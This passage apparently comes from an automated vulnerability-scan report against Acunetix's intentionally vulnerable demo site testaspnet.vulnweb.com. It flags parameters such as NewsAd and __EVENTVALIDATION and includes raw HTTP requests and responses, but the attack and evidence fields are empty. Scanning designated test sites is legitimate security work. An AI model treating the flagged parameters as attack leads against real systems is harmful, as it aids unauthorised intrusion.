style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3
Method	GET
Parameter	NewsAd
Attack
Evidence
Show / hide Request and Response
Request Header - size: 350 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 18040
Response Body - size: 18,040 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=3" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkSGybNfT47lMyCtVUwkelFkD9wY8=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLEirm5BAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBGR35lZNwQ8OqxiqiZO/ZZOlJz58" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV> <DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently, therefore it is not recommended that the same beta version is used for more than 30 days. To beta-test beyond 30 days, users should install the latest beta version or, if available, use the release version.</p> <p><strong>About Acunetix Web Vulnerability Scanner</strong><br /> Acunetix Web Vulnerability Scanner, a unique web application scanning product that makes securing one’s website easier than ever. Acunetix Web Vulnerability Scanner is an automated web application security testing tool that crawls an entire website and attacks it so as to identify potential weaknesses before hackers do. Further information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/about.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 404 bytes.	POST http://testaspnet.vulnweb.com/about.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/about.aspx Content-Length: 981 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 981 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t&__VIEWSTATEGENERATOR=E809BCA5&__EVENTVALIDATION=%2FwEWVwKqq9H0CQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBMr7fvEMmSiYYPLDantQRZkqAblw
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 14619
Response Body - size: 14,619 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>About</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="about.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="E809BCA5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" 